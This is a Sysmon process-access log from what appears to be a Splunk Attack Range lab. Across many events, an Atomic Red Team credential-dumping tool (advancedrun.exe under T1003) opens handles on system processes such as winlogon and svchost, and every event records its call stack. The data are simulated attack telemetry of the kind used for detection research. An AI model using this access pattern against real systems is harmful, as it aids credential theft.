17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952246Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952245Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952244Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952243Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952242Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003952239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.339{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
